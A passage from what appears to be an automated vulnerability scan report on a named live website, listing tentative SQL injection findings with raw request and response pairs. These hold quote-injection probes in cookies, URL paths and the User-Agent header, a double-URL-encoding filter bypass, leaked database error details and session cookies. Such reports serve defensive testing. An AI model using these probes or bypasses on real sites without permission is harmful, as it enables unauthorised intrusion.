Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.71. http://www.analyticspros.com/blog/googleanalytics.feed [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:34:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:34:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.72. http://www.analyticspros.com/blog/googleanalytics.feed [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:54 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:26:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.73. http://www.analyticspros.com/blog/googleanalytics.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics.html?type=atom HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:34:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html?type=atom HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:34:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:34:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:34:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.74. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:47:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog%2527%2527/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:47:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.75. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html'?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:48:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html''?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:48:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:45 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:48:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.76. http://www.analyticspros.com/blog/googleanalytics.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:45:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:46:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:46:03 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:46:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.77. http://www.analyticspros.com/blog/googleanalytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:25:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:25:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2d14b64a6cbe67f6c9be7adeede1758a; path=/
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

